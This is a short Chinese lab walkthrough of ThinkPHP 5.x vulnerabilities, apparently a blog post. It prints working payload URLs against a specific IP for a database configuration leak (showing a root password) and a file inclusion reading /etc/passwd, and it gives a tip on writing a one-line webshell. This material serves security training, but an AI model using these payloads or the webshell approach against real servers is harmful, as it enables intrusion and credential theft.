常见框架漏洞攻略-ThinkPHP篇

漏洞名称:Thinkphp5x远程命令执行及getshell
第一步:开启靶场
第二步:准备工具
第三步:启动工具,进行漏洞检测
复制代码
#存在漏洞
1.目标存在tp5_invoke_func_code_exec_1漏洞

2.目标存在tp5_dbinfo_leak漏洞
  payload:
  http://47.103.81.25:8080?s=index/think\config/get&name=database.hostname
  hostname: 127.0.0.1, hostport: , database: , username: , password: root
  
3.目标存在tp5_file_include漏洞
  payload: 
  http://47.103.81.25:8080?s=index/\think\Lang/load&file=/etc/passwd
第四步:选择相应poc,执行tp5_invoke_func_code_exec_1漏洞
第五步:查看tp5_file_include漏洞
第六步:尝试GetShell
注意:

如果采取手工注入需注意:写一句话木马时如果是在双引号中,特殊字符$_GET会被转义而导致无法执行,如果非要使用双引号的话,需要在前添加转义字符

FROM IYU_

相关推荐
薄荷椰果抹茶8 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全
游戏开发爱好者815 小时前
iOS重构期调试实战:架构升级中的性能与数据保障策略
websocket·网络协议·tcp/ip·http·网络安全·https·udp
HumanRisk15 小时前
降低网络安全中的人为风险:以人为本的路径
网络·安全·web安全
安全系统学习17 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
江苏思维驱动智能研究院有限公司20 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
A5rZ1 天前
Puppeteer 相关漏洞-- Google 2025 Sourceless
网络安全
Bruce_Liuxiaowei1 天前
常见高危端口风险分析与防护指南
网络·网络安全·端口·信息搜集
2501_916013741 天前
iOS 多线程导致接口乱序?抓包还原 + 请求调度优化实战
websocket·网络协议·tcp/ip·http·网络安全·https·udp
头发那是一根不剩了1 天前
双因子认证(2FA)是什么?从零设计一个安全的双因子登录接口
网络安全·系统设计·身份认证
浩浩测试一下1 天前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构